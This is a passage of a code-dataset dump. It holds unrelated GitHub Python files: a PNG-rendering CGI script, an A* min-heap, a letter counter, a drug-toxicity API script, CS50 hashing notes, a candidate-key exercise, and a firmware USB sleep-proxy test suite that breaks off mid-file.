simpleEval(jsonObj):\n return {\n 'num': lambda c, x, y: [jsonObj['val'] for i in range(0,3)],\n 'x' : lambda c, x, y: [x for i in range(0,3)],\n 'y': lambda c, x, y: [y for i in range(0,3)],\n 'atan': lambda c, x, y: [math.atan(c[0][i]) for i in range(0,3)],\n 'abs': lambda c, x, y: [abs(c[0][i]) for i in range(0,3)],\n 'cos': lambda c, x, y: [math.cos(c[0][i]) for i in range(0, 3)],\n 'exp': lambda c, x, y: [math.exp(c[0][i]) for i in range(0, 3)],\n 'log': lambda c, x, y: 
[safe_ternary(c[0][1], lambda x: x <= 0.0, lambda x: 0, lambda x: math.log(x)) for i in range(0, 3)],\n 'neg': lambda c, x, y: [-1.0 * c[0][i] for i in range(0, 3)],\n 'rd': lambda c, x, y: [math.floor(c[0][i]) for i in range(0, 3)],\n 'ru': lambda c, x, y: [math.ceil(c[0][i]) for i in range(0, 3)],\n 'sin': lambda c, x, y: [math.sin(c[0][i]) for i in range(0, 3)],\n 'add': lambda c, x, y: [c[0][i] + c[1][i] for i in range(0, 3)],\n 'div': lambda c, x, y: [safe_ternary((c[0][1], c[1][i]), lambda x : x[1] == 0.0, lambda x: 0, lambda x: x[0]/x[1]) for i in range(0, 3)],\n 'mul': lambda c, x, y: [c[0][i] * c[1][i] for i in range(0, 3)],\n 'sub': lambda c, x, y: [c[0][i] - c[1][i] for i in range(0, 3)],\n 'ccrgb': lambda c, x, y: [c[0][0], c[1][1], c[2][2]],\n 'cchsl': hslToRgb\n }[jsonObj['t']]\n\ndef makeTopEvaluator(jsonObj):\n eval = makeEvaluator(jsonObj)\n oldEval = eval['eval']\n eval['eval'] = lambda xs, ys: coerceResults(oldEval(xs, ys), xs, ys, eval['dep'], {'x': True, 'y': True})\n return eval\n\ndef makeEvaluator(jsonObj):\n toReturn = {}\n typeInfo = fnInfo[jsonObj['t']]\n if (typeInfo['children'] > 0):\n toReturn['c'] = [makeEvaluator(jsonObj['ch'][i]) for i in range(0, len(jsonObj['ch']))]\n # Figure out if we depend on x, y, or neither\n toReturn['dep'] = {}\n toReturn['dep']['x'] = (jsonObj['t'] == 'x')\n toReturn['dep']['y'] = (jsonObj['t'] == 'y')\n if ('c' in toReturn):\n for child in toReturn['c']:\n for xy in ['x', 'y']:\n if (child['dep'][xy]):\n toReturn['dep'][xy] = True\n simEval = simpleEval(jsonObj)\n if ('needsMap' in typeInfo and typeInfo['needsMap']):\n mapStrat = makeMappingStrategyList(jsonObj)\n else:\n mapStrat = lambda l: l\n toReturn['eval'] = lambda xs, ys: xyAdapter(toReturn, mapStrat, simEval, xs, ys)\n return toReturn\n\n# Results are listed in row order - (x0, y0), (x1, y0), ..., (xn, y0), (x0, y1)\n# etc.\ndef coerceResults(results, xs, ys, sourceDeps, targetDeps):\n coerceY = sourceDeps['y'] == False and targetDeps['y'] == True\n coerceX = sourceDeps['x'] == False and targetDeps['x'] == True\n if (coerceY):\n results = [r for y in ys for r in results]\n if (coerceX):\n results = [r for r in results for x in xs]\n return results\n\ndef xyAdapter(fnObj, mapStrat, simEval, xs, ys):\n childResults = []\n if ('c' in fnObj):\n for childObj in fnObj['c']:\n childResults.append(coerceResults(childObj['eval'](xs, ys), xs, ys, childObj['dep'], fnObj['dep']))\n if (not fnObj['dep']['x']):\n xs = [0.0]\n if (not fnObj['dep']['y']):\n ys = [0.0]\n childArgs = list(zip(*childResults))\n xys = [(x, y) for y in ys for x in xs]\n if ('c' in fnObj):\n return [mapStrat(simEval(c, x, y)) for ((x, y), c) in zip(xys, childArgs)]\n else:\n return [mapStrat(simEval([], x, y)) for (x, y) in xys]\n#def makeEvaluatorOld(jsonObj):\n# return {\n# 'num': (lambda jo: {'eval': (lambda this, x, y: [jo['val'] for i in range(0,3)])}),\n# 'x': (lambda jo: {'eval': (lambda this, x, y: [x for i in range(0,3)])}),\n# 'y': (lambda jo: {'eval': (lambda this, x, y: [y for i in range(0,3)])}),\n# 'atan': (lambda jo: {'c': [makeEvaluatorOld(jsonObj['ch'][0])], 'eval': (lambda this, x, y: [makeMappingStrategy(jo)(math.atan(v)) for v in this['c'][0]['eval'](this['c'][0], x,y)])}),\n# 'add': (lambda jo: {'c': [makeEvaluatorOld(jsonObj['ch'][0]), makeEvaluatorOld(jsonObj['ch'][1])], 'eval': (lambda this, x, y: [makeMappingStrategy(jo)(v1 + v2) for (v1,v2) in zip(this['c'][0]['eval'](this['c'][0],x,y), this['c'][1]['eval'](this['c'][1],x,y))])}),\n# }[jsonObj['t']](jsonObj)\n \nform = 
cgi.FieldStorage()\nfunc = jsonsinglequote.read(form.getfirst('f'))\nwidth = int(form.getfirst('w'))\nheight = int(form.getfirst('h'))\n#if (form.getfirst('saveFunc') == 't'):\n \n# Don't do anything unreasonably large\nif (width <= 0 or height <= 0 or width > 10000 or height > 10000):\n pass\nelse:\n c = pngcanvas.PNGCanvas(width, height)\n c.apply(makeTopEvaluator(func))\n\n print(\"Content-type: image/png\\n\")\n print(c.dump())\n","repo_name":"gregstoll/ppga","sub_path":"makepng.py","file_name":"makepng.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16033231882","text":"def parent_index(node_index):\r\n return (node_index - 1) >> 1\r\n\r\n\r\ndef left_child_index(node_index):\r\n return (node_index << 1) + 1\r\n\r\n\r\ndef right_child_index(node_index):\r\n return (node_index + 1) << 1\r\n\r\n\r\n# Min-Heap for use in A* algorithm\r\nclass AStarMinHeap:\r\n len = 0\r\n nodes = []\r\n\r\n def __init__(self, graph):\r\n self.nodes = list(graph.nodes)\r\n self.len = len(graph.nodes)\r\n for i in range(self.len):\r\n self.nodes[i].heap_pos = i\r\n self.init_heap()\r\n\r\n def swap(self, a, b):\r\n self.nodes[a].heap_pos = b\r\n self.nodes[b].heap_pos = a\r\n self.nodes[a], self.nodes[b] = self.nodes[b], self.nodes[a]\r\n\r\n # Checks if a node is too far up in the heap, and swaps it downwards to its correct position\r\n def fix_heap(self, index):\r\n child_to_swap = left_child_index(index)\r\n if child_to_swap < self.len:\r\n right_child = child_to_swap + 1\r\n\r\n if right_child < self.len and self.nodes[right_child].prio < self.nodes[child_to_swap].prio:\r\n child_to_swap = right_child\r\n\r\n if self.nodes[child_to_swap].prio < self.nodes[index].prio:\r\n self.swap(index, child_to_swap)\r\n self.fix_heap(child_to_swap)\r\n\r\n def init_heap(self):\r\n index = self.len >> 1\r\n while index > 0:\r\n index -= 1\r\n self.fix_heap(index)\r\n\r\n def pop_min(self):\r\n self.len -= 1\r\n self.swap(0, self.len)\r\n self.fix_heap(0)\r\n self.nodes[self.len].heap_pos = -1 # Not in the heap anymore\r\n return self.nodes[self.len]\r\n\r\n # Checks if a node is too far down in the heap, and swaps it upwards to its correct position\r\n def prio_decreased(self, index):\r\n parent = parent_index(index)\r\n while index > 0 and self.nodes[index].prio < self.nodes[parent].prio:\r\n self.swap(index, parent)\r\n index = parent\r\n parent = parent_index(index)\r\n\r\n # Same as fix_heap(index)\r\n def prio_increased(self, index):\r\n self.fix_heap(index)\r\n\r\n def set_prio(self, index, prio):\r\n delta = prio - self.nodes[index].prio\r\n self.nodes[index].prio = prio\r\n if delta > 0:\r\n self.prio_increased(index)\r\n elif delta < 0:\r\n self.prio_decreased(index)\r\n\r\n def insert(self, node):\r\n self.len += 1\r\n if len(self.nodes) <= self.len:\r\n self.nodes.append(node)\r\n self.len = len(self.nodes)\r\n else:\r\n self.nodes[self.len - 1] = node\r\n\r\n self.nodes[self.len - 1].heap_pos = self.len - 1\r\n self.prio_decreased(self.len - 1)\r\n","repo_name":"mchyll/algdat","sub_path":"src/Oving13/AStarMinHeap.py","file_name":"AStarMinHeap.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72557108888","text":"st = input()\ngl = 'аеёиоуыэюяАЕЁИОУЫЭЮЯ'\nsogl = 'бвгджзйклмнпрстфхцчшщБВГДЖЗЙКЛМНПРСТФХЦЧШЩ'\ncount_gl = 0\ncount_sogl = 0\n\nfor i in st:\n if i in gl:\n count_gl += 1\n if i in 
sogl:\n count_sogl += 1\nprint(f'Количество гласных букв равно {count_gl}')\nprint(f'Количество согласных букв равно {count_sogl}')\n","repo_name":"IhorStoliarov/es","sub_path":"stepik/_9_string/_9_string_indexation/_9_7_alphabet.py","file_name":"_9_7_alphabet.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72074169049","text":"import time\r\nfrom ElsevierAPI.ResnetAPI.PathwayStudioGOQL import OQL\r\nfrom ElsevierAPI.ResnetAPI.NetworkxObjects import Reference\r\nfrom ElsevierAPI import load_api_config\r\nfrom ElsevierAPI.ResnetAPI.ResnetAPISession import APISession\r\nfrom ElsevierAPI.PharmapendiumAPI.PharmapendiumAPI import SafetyPP\r\nimport pandas as pd\r\n\r\nAPIconfig = load_api_config()\r\nps_api = APISession(APIconfig)\r\nfileIn = 'Drugs for Regulators in 4 patients.txt'\r\nInDir = 'D:\\\\Python\\\\PBTA\\\\PNOC003\\\\4 patients analysis\\\\'\r\nwith open(InDir+fileIn) as f:\r\n drugs = [line.rstrip('\\n') for line in f]\r\n\r\nprint('Finding drugs in %s in Resnet' %(fileIn))\r\nOQLquery = OQL.get_entities_by_props(drugs, ['Name', 'Alias'], only_object_types=['Small Molecule'])\r\nps_api.add_ent_props(['Name','PharmaPendium ID'])\r\nresnet_drugs = ps_api.process_oql(OQLquery,'Find all drugs')\r\nprint ('Found %d drugs in Resnet' % len(resnet_drugs))\r\n\r\n#removing duplicates wiht no PharmaPendium ID\r\nresnet2pharmapendium_map = dict()\r\nfor i, drug in resnet_drugs.nodes(data=True):\r\n try:\r\n resnet2pharmapendium_map[str(drug['Name'][0]).lower()] = drug['PharmaPendium ID'][0]\r\n except KeyError: continue\r\n\r\nall_drugs = list(resnet_drugs.nodes(data=True))\r\nfor i, drug in all_drugs:\r\n if str(drug['Name'][0]).lower() in resnet2pharmapendium_map.keys() and 'PharmaPendium ID' not in drug.keys():\r\n resnet_drugs.remove_node(i)\r\nprint ('%d drugs left after deduplication' % resnet_drugs.number_of_nodes())\r\n\r\nprint('Beginning Pharmapendium response download with urllib...')\r\nsafety_in_pp = SafetyPP('lookupFuzzy',APIconfig)\r\n\r\nfileOut2 = InDir + fileIn[:len(fileIn)-4]+'_unmapped.txt'\r\ncol_names = ['Smiles','Resnet name','Tox Category','#Ref','References']\r\nToxPandas = pd.DataFrame(columns=col_names)\r\nToxPandas.index.name = \"PP name\\ttoxicity\"\r\n\r\nstart_time = time.time()\r\nprint ('Will find toxicities for %d drugs found in Resnet' % resnet_drugs.number_of_nodes())\r\nfor i, drug in resnet_drugs.nodes(data=True):\r\n drugPSname = drug['Name'][0]\r\n try: drugPPname = drug['PharmaPendium ID'][0]\r\n except KeyError: drugPPname = drugPSname\r\n safety_in_pp._add_param({'drugs':drugPPname})\r\n all_docs = safety_in_pp.get_results()\r\n \r\n DrugToxicities = dict()\r\n for doc in all_docs:\r\n toxicity=doc['effect']\r\n try: \r\n DrugToxicities[toxicity].append(doc)\r\n except KeyError:\r\n DrugToxicities[toxicity] = [doc]\r\n\r\n toxCount = 0\r\n for toxicity, references in DrugToxicities.items():\r\n toxCount += 1\r\n print('\\'%s\\' - %d from %d toxicities for \\\"%s\\\" was reported in %d documents' % (toxicity,toxCount,len(DrugToxicities),drugPSname,len(references)))\r\n pandaIndex = drugPPname+'\\t'+toxicity\r\n \r\n try: smiles = references[0]['smiles']\r\n except KeyError: smiles=''\r\n\r\n toxTax = safety_in_pp.GetTopEffectCategory(toxicity)\r\n\r\n ToxPandas.at[pandaIndex,col_names[0]] = smiles\r\n ToxPandas.at[pandaIndex,col_names[1]] = drugPSname\r\n ToxPandas.at[pandaIndex,col_names[2]] = toxTax\r\n\r\n refIndex = dict()\r\n for ref in 
references:\r\n document = ref['document']\r\n\r\n try:docName = document['name']\r\n except KeyError:\r\n try: docName = document['article']\r\n except KeyError: docName = document['journal']\r\n \r\n docSource = document['sourceShort']\r\n refIdentifier = docSource+':'+docName\r\n try: PPRef = refIndex[refIdentifier]\r\n except KeyError:\r\n PPRef = Reference('Title',refIdentifier)\r\n refIndex[refIdentifier] = PPRef\r\n\r\n try:PubYear = str(document['year'])\r\n except KeyError: PubYear = 'historic'\r\n PPRef.set_property('PubYear', PubYear)\r\n \r\n try:dose = ref['dose']\r\n except KeyError: dose = ''\r\n\r\n try: doseType=ref['doseType']\r\n except KeyError: doseType=''\r\n \r\n try:route=ref['route']\r\n except KeyError: route=''\r\n \r\n organism=ref['specie']\r\n PPRef.update_with_value(route, doseType + ' in ' + organism + ' ' + dose)\r\n\r\n addToPandas = set()\r\n for ref in refIndex.values():\r\n addToPandas.update([ref.to_str('Title', sep='-')])\r\n\r\n ToxPandas.at[pandaIndex,col_names[3]] = len(addToPandas)\r\n reflist = '|'.join(list(addToPandas))\r\n ToxPandas.at[pandaIndex,col_names[4]] = reflist \r\n \r\nToxPandas.to_csv(InDir+fileIn[:len(fileIn)-4]+'_PPtaxonomy.txt',sep='\\t')\r\nprint('Finished finding toxicities in Pharmapendium in %s' % ps_api.execution_time(start_time))\r\n","repo_name":"AntonYuryev/ElsevierAPI","sub_path":"DrugToxFromPharmapendium.py","file_name":"DrugToxFromPharmapendium.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"31"} +{"seq_id":"16305968377","text":"# A file i use python to simulate the stuff I do in C to see if it works\n\n# with open(\"dictionaries/large\",\"r\") as file:\n# data = file.read().split(\"\\n\")\n# count = 0\n# for word in data:\n# if len(word) < 1:\n# continue\n# if len(word) > 25:\n# print(word)\n\ncount = 0\nn = 4 # number of characters in word: strlen(word)\nchar_count = 0 # on which character: i\ne = f = 0\nlet = \"abcdefghijklmnopqrstuvwxyz?\"\ndict = {}\nindex = 0\nhash_loc = [0, 26, 728, 19682, 531440, 14348906]\nfor a in range(26):\n for b in range(27):\n for c in range(27):\n for d in range(27):\n# for e in range(27):\n# for f in range(27):\n# + e * pow(27, n - 5) + e * pow(27, n - 6)\n dict[f\"{let[a]}{let[b]}{let[c]}{let[d]}\"] = count\n count += 1\n # if (a * pow(27, n - 1) + b * pow(27, n - 2) + c * pow(27, n - 3) + d * pow(27, n - 4)) != (count - 1):\n # print(False)\n # print(f\"{c[i]}: {i} {c[j]}: {j} {c[k]}: {k}--> {count - 1} i * 27^2 + j * 27^1 + k = {i * 27 * 27 + j * 27 + k}\")\n\nprint(f\"Number of combinations: {count}\")\n# print(ord(\"z\".upper()) - ord(\"A\"))\n# print(\"?\".isalpha())\ntest = \"aaa?cefas\"\nletter_index = 0\nfor x in range(4):\n letter = test[x]\n if letter.isalpha():\n temp = ord(letter.upper()) - ord(\"A\")\n else:\n temp = 26\n # print(temp, n - letter_index - 1, letter_index, n)\n index += (temp * pow(27, n - letter_index - 1))\n letter_index += 1\nprint(dict[test[:4]], index)\n\n'''\nsome C stuff for if the load worked using tries not hash tables\n // JUST FOUND OUT THESE ARE FOR TRIES NOT HASH TABLES\n // Set Temp node to be node with first letter\n node *temp_letter_table = &table[hash(word[0])];\n // For each letter starting from 2nd letter (if word is 2+ length), go into correct node in table\n for (int i = 1; i < strlen(word) && i < 6; i++)\n {\n temp_letter_table = *temp_letter_table[hash(word[i])];\n }\n // Set the correct node of that word to be true\n if 
(temp_letter_table->word == NULL)\n temp_letter_table->word = word;\n temp_letter_table->next = next;\n'''\n\n# log: just found out the table[N] hash table only all possibilities of words/combinations with only 6+ characters but not any 5- charactered combinations\n'''\nConsidering 6 characters require 26 x 27^5\nthen 5 would be 26 x 27^4\nso basically the total needed to cover all possible combinations with all lengths from 1 - 6 (6 + words will be stored at 6) is:\n(26) + (26 x 27) + (26 x 27^2) + (26 x 27^3) + (26 x 27^4) + (26 x 27^5)\n\n\n'''\n# print((27**5 + 27**4 + 27**3 + 27**2 + 27**1 + 27**0) * 26)\n# print(27**5 * 26)\n\n# prev = 0\n# for i in range(6):\n# prev += 27**i * 26\n# print(prev, end = \", \")\n# print()","repo_name":"hayden1126/CS50x","sub_path":"Week5/speller/tests/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4432978100","text":"import sys\nsys.stdin = open(\"후보키_input.txt\")\n\ndef DFS(dep):\n\n if dep == LenC:\n # print(A)\n if Search(A): # 유일성을 만족함.\n # print(A)\n tmp = set()\n for y in range(LenC):\n if A[y] == 1:\n tmp.add(y)\n\n for s in id:\n if s - tmp == set():\n return\n id.append(tmp)\n # print(id)\n return\n\n for i in range(2):\n A[dep] = i\n DFS(dep + 1)\n A[dep] = 0\n\ndef Search(A):\n\n tmp = {}\n for x in range(LenR):\n name = ''\n for y in range(LenC):\n if A[y] == 1:\n name += relation[x][y]\n if name != '' and name not in tmp:\n tmp[name] = 1\n else:\n return 0\n # print(tmp)\n return 1\n\n\nrelation = [list(input().split()) for _ in range(6)]\n\nanswer = 0\nLenC = len(relation[0])\nLenR = len(relation)\n\nvisit = [0] * LenC # 유일성과 최소성을 지킨 열은 체크하자.\nid = []\n# 모든 부분 집합의 경우의 수를 전부 탐색해야한다.\n# 그 중 visit이 체크되면 그 부분은 continue\n\nA = [0] * LenC\nDFS(0)\nanswer = len(id)\nprint(answer)","repo_name":"yoonwoo123/Algorithm","sub_path":"191129알고_pro_kakao/후보키.py","file_name":"후보키.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24894121472","text":"\"\"\"\n THIS SCRIPT MUST BE EXECUTED ON LKP.\n\"\"\"\nimport os\nimport time\n\nimport pytest\n\nfrom tools.command import Command\nfrom tools.pactoolper import PacTool, CAPS_AQ_USB_VENDOR_CMD_PHY_OPTS, CAPS_AQ_USB_VENDOR_CMD_SLEEP_PROXY, \\\n USB_POWER, USB_SLEEP_PROXY\nfrom tools.constants import LINK_SPEED_AUTO, MTU_1500\nfrom infra.test_base import TestBase, idparametrize\nfrom tools.driver import Driver, DRV_TYPE_DIAG_WIN_USB\nfrom tools.drv_iface_cfg import DrvUsbConfig\nfrom tools.power import Power\nfrom tools.utils import get_atf_logger\n\nlog = get_atf_logger()\n\n\ndef setup_module(module):\n # import tools._test_setup # uncomment for manual test setup\n os.environ[\"TEST\"] = \"fw_usb_sleep_proxy\"\n\n\nclass TestFWUsbSleepProxy(TestBase):\n AFTER_TURNOFF_DELAY = 30\n BEFORE_PING_DELAY = 15\n WAKE_COUNTER_DELAY = 5\n\n DUT_MAC = \"00:17:b6:a1:a2:a3\"\n DUT_IPs4 = [\"192.168.0.3\", \"192.168.0.4\", \"192.168.0.5\"]\n DUT_IPs6 = [\"4000:0000:0000:0000:1601:bd17:0c02:2403\",\n \"4000:0000:0000:0000:1601:bd17:0c02:2413\",\n \"4000:0000:0000:0000:1601:bd17:0c02:2423\",\n \"4000:0000:0000:0000:1601:bd17:0c02:2433\"]\n LKP_IP4 = \"192.168.0.24\"\n NETMASK_IP4 = \"255.255.255.0\"\n LKP_IP6 = \"4000:0000:0000:0000:1601:bd17:0c02:2402\"\n PREFIX_IP6 = \"64\"\n WAKEPORT = 13370\n\n SLEEP_PROXY_FLAG_MAGIC_PACKET = 2\n\n @classmethod\n def setup_class(cls):\n 
super(TestFWUsbSleepProxy, cls).setup_class()\n\n try:\n cls.log_server_dir = cls.create_logs_dir_on_log_server()\n\n cls.install_firmwares()\n\n cls.dut_driver = Driver(port=cls.dut_port, drv_type=DRV_TYPE_DIAG_WIN_USB, version=cls.dut_drv_version,\n host=cls.dut_hostname)\n cls.lkp_driver = Driver(port=cls.lkp_port, version=cls.lkp_drv_version)\n cls.dut_driver.install()\n cls.lkp_driver.install()\n cls.dut_power = Power(host=cls.dut_hostname)\n cls.dut_pactool = PacTool(port=cls.dut_port, host=cls.dut_hostname)\n\n cls.lkp_ifconfig.set_link_speed(LINK_SPEED_AUTO)\n cls.lkp_ifconfig.set_ip_address(cls.LKP_IP4, cls.NETMASK_IP4, None)\n cls.lkp_ifconfig.set_ipv6_address(cls.LKP_IP6, cls.PREFIX_IP6, None)\n\n except Exception as e:\n log.exception(e)\n log.exception(\"Failed while setting up class\")\n raise e\n\n @classmethod\n def teardown_class(cls):\n super(TestFWUsbSleepProxy, cls).teardown_class()\n # Put wol on LKP back\n cmd = \"sudo ethtool -s {} wol g\".format(cls.lkp_iface)\n disable_cmd = Command(cmd=cmd)\n disable_cmd.run_join(10)\n\n def setup_method(self, method):\n super(TestFWUsbSleepProxy, self).setup_method(method)\n\n if not self.is_host_alive_and_ready(self.dut_hostname):\n raise Exception(\"DUT is not online, can't perform test\")\n\n if not self.dut_driver.is_installed():\n self.dut_driver.install()\n\n def teardown_method(self, method):\n super(TestFWUsbSleepProxy, self).teardown_method(method)\n self.bring_host_online(self.dut_hostname)\n\n def hibernate_dut(self, retry_interval=15):\n log.info(\"Hibernating DUT\")\n self.dut_power.hibernate()\n if not self.poll_host_powered_off(self.dut_hostname, retry_interval=retry_interval):\n raise Exception(\"Couldn't hibernate DUT\")\n log.info(\"DUT is hibernated\")\n\n time.sleep(self.AFTER_TURNOFF_DELAY)\n if self.is_host_powered_on(self.dut_hostname):\n raise Exception(\"DUT came back online spuriously before test\")\n log.info(\"DUT is still hibernated after {} seconds of sleeping\".format(self.AFTER_TURNOFF_DELAY))\n\n # Link should be UP on link partner\n speed = self.lkp_ifconfig.wait_link_up()\n assert speed == self.supported_speeds[0]\n\n def run_test_with_offloads(self, ip_v4_address, ip_v6_address):\n eth_cfg = DrvUsbConfig()\n dut_mac_address = [int(m, 16) for m in self.DUT_MAC.split(\":\")]\n wol_bit = self.SLEEP_PROXY_FLAG_MAGIC_PACKET\n data = 0\n for i in range(len(eth_cfg.mac_octets)):\n eth_cfg.mac_octets[i] = dut_mac_address[i]\n eth_cfg.flags = wol_bit\n eth_cfg.wolPatternCount = 0\n for j in range(len(eth_cfg.wolPatterns)):\n for i in range(len(eth_cfg.wolPatterns[j].mask)):\n eth_cfg.wolPatterns[j].mask[i] = 0\n eth_cfg.wolPatterns[j].crc16 = 0\n eth_cfg.wolPatterns[j].crc32 = 0\n eth_cfg.linkUpTimeout = 0\n eth_cfg.linkDownTimeout = 0\n eth_cfg.ipv4Count = len(ip_v4_address)\n for i in range(eth_cfg.ipv4Count):\n eth_cfg.ipv4[i] = ip_v4_address[i]\n for i in range(eth_cfg.ipv4Count, len(eth_cfg.ipv4)):\n eth_cfg.ipv4[i] = 0\n eth_cfg.ipv6Count = len(ip_v6_address)\n for j in range(len(ip_v6_address)):\n for i in range(len(ip_v6_address[j])):\n eth_cfg.ipv6[j].ipv6[i] = ip_v6_address[j][i]\n data = eth_cfg.get_data()\n self.dut_pactool.control_transfer_out(vendor_cmd=CAPS_AQ_USB_VENDOR_CMD_SLEEP_PROXY,\n data=data, size=len(data))\n time.sleep(5)\n self.dut_pactool.control_transfer_out(vendor_cmd=CAPS_AQ_USB_VENDOR_CMD_PHY_OPTS,\n data=[0, 0, USB_SLEEP_PROXY | USB_POWER, 0], size=4)\n log.info('Wol for wake on magic packet and sleep proxy are configured')\n # Link should be UP on link partner\n speed = 
self.lkp_ifconfig.wait_link_up()\n assert speed == self.supported_speeds[0]\n\n time.sleep(self.BEFORE_PING_DELAY)\n\n @idparametrize(\"hibernation\", [False, True])\n def test_icmp_offload(self, hibernation):\n \"\"\"\n @description: Perform simple ping check in sleep proxy mode (IPv4 version).\n\n @steps:\n 1. Configure DUT offload with multiple IPv4 addresses.\n 2. Ping each DUT's IP from LKP (16 requests).\n 3. Make sure all pings are answered.\n\n @result: Ping is passed.\n @duration: 80 seconds.\n \"\"\"\n ip_v4_addresses = []\n for i in range(len(self.DUT_IPs4)):\n addr = [int(m) for m in self.DUT_IPs4[i].split(\".\")]\n ip_v4_addresses.append(addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24)\n\n self.run_test_with_offloads(ip_v4_addresses, [])\n\n if hibernation:\n self.hibernate_dut()\n\n for address in self.DUT_IPs4:\n log.info(\"Ping {} from {}\".format(address, self.LKP_IP4))\n assert self.ping(self.lkp_hostname, address, 16, ipv6=False, src_addr=self.LKP_IP4) is True, \\\n \"Failed to ping {} from {}\".format(address, self.LKP_IP4)\n\n @idparametrize(\"hibernation\", [False, True])\n def test_ipv6_offload(self, hibernation):\n \"\"\"\n @description: Perform simple ping check in sleep proxy mode (IPv6 version).\n\n @steps:\n 1. Configure DUT offload with multiple IPv6 addresses.\n 2. Ping each DUT's IP from LKP (16 requests).\n 3. Make sure all pings are answered.\n\n @result: Ping is passed.\n @duration: 90 seconds.\n \"\"\"\n ip_v6_address = []\n for i in range(len(self.DUT_IPs6)):\n addr = [int(m, 16) for m in self.DUT_IPs6[i].split(\":\")]\n v6_addr = []\n for j in range(len(addr)):\n v6_addr.append((addr[j] & 0xff00) >> 8)\n v6_addr.append(addr[j] & 0x00ff)\n ip_v6_address.append(v6_addr)\n\n self.run_test_with_offloads([], ip_v6_address)\n\n if hibernation:\n self.hibernate_dut()\n\n for address in self.DUT_IPs6:\n log.info(\"Ping {} from {}\".format(address, self.LKP_IP6))\n assert self.ping(self.lkp_hostname, address, 16, ipv6=True, src_addr=self.LKP_IP6) is True, \\\n \"Failed to ping {} from {}\".format(address, self.LKP_IP6)\n\n @idparametrize(\"hibernation\", [False, True])\n def test_small_fragmentated_pings(self, hibernation):\n \"\"\"\n @description: Perform ping check in sleep proxy mode with fragmented requests.\n\n @steps:\n 1. Configure DUT offload with multiple IPv4 and IPv6 addresses.\n 2. Set 200 MTU on LKP.\n 3. Ping each DUT's IP from LKP (16 requests, length 500 bytes).\n 4. Make sure all pings are answered.\n\n @result: Ping is passed.\n @duration: 80 seconds.\n \"\"\"\n try:\n self.lkp_ifconfig.set_mtu(200)\n\n ip_v4_addresses = []\n for i in range(len(self.DUT_IPs4)):\n addr = [int(m) for m in self.DUT_IPs4[i].split(\".\")]\n ip_v4_addresses.append(addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24)\n\n self.run_test_with_offloads(ip_v4_addresses, [])\n\n if hibernation:\n self.hibernate_dut()\n\n for address in self.DUT_IPs4:\n log.info(\"Ping {} from {}\".format(address, self.LKP_IP4))\n assert self.ping(\n self.lkp_hostname, address, 16, ipv6=False, src_addr=self.LKP_IP4, payload_size=500, margin=20\n ) is True, \"Ping {} from {} failed unexpectedly (first request fragment should be replied)\".format(\n address, self.LKP_IP4\n )\n finally:\n self.lkp_ifconfig.set_mtu(MTU_1500)\n\n @idparametrize(\"hibernation\", [False, True])\n def test_big_packets_drop_pings(self, hibernation):\n \"\"\"\n @description: Perform ping check in sleep proxy mode after big packets.\n\n @steps:\n 1. 
Configure DUT offload with multiple IPv4 and IPv6 addresses.\n 2. Ping each DUT's IP from LKP (16 requests, length 5000 bytes).\n 3. FW should drop these pings.\n 4. Ping each DUT's IP from LKP (16 requests).\n 5. Make sure all pings are answered.\n\n @result: Ping is passed.\n @duration: 80 seconds.\n \"\"\"\n ip_v4_addresses = []\n for i in range(len(self.DUT_IPs4)):\n addr = [int(m) for m in self.DUT_IPs4[i].split(\".\")]\n ip_v4_addresses.append(addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24)\n\n self.run_test_with_offloads(ip_v4_addresses, [])\n\n if hibernation:\n self.hibernate_dut()\n\n for address in self.DUT_IPs4:\n log.info(\"Ping {} from {}\".format(address, self.LKP_IP4))\n # Run 500 payload packets should be dropped\n self.ping(self.lkp_hostname, address, 16, ipv6=False, src_addr=self.LKP_IP4, payload_size=5000, margin=20)\n # Run small payload packets should be transfered\n assert self.ping(self.lkp_hostname, address, 16, ipv6=False, src_addr=self.LKP_IP4) is True, \\\n \"Failed to ping {} from {}\".format(address, self.LKP_IP4)\n\n @idparametrize(\"hibernation\", [False, True])\n def test_ipv4_offload_multi_networks(self, hibernation):\n \"\"\"\n @description: Perform ping check in sleep proxy mode with multiple networks (IPv4 version).\n\n @steps:\n 1. Configure DUT offload with multiple IPv4 addresses in different local networks.\n 2. Set IP address on LKP for each local network.\n 3. Ping each DUT's IP from LKP (4 requests).\n 4. Make sure all pings are answered.\n\n @result: Ping is passed.\n @duration: 60 seconds.\n \"\"\"\n DUT_IP4_1 = [\"169.254.23.232\", \"169.254.23.233\", \"169.254.23.234\"]\n LKP_IP4_1 = [\"169.254.23.1\"]\n LKP_MSK_1 = [\"255.255.0.0\"]\n\n DUT_IP4_2 = [\"192.168.0.3\", \"192.168.0.4\"]\n LKP_IP4_2 = [\"192.168.0.2\"]\n LKP_MSK_2 = [\"255.255.255.0\"]\n\n DUT_IP4_3 = [\"10.0.0.3\"]\n LKP_IP4_3 = [\"10.0.0.2\"]\n LKP_MSK_3 = [\"255.255.255.240\"]\n\n ip_v4_addresses = []\n for i in range(len(DUT_IP4_1)):\n addr = [int(m) for m in DUT_IP4_1[i].split(\".\")]\n ip_v4_addresses.append(addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24)\n for i in range(len(DUT_IP4_2)):\n addr = [int(m) for m in DUT_IP4_2[i].split(\".\")]\n ip_v4_addresses.append(addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24)\n addr = [int(m) for m in DUT_IP4_3[0].split(\".\")]\n ip_v4_addresses.append(addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24)\n\n # Configure IPv4 on 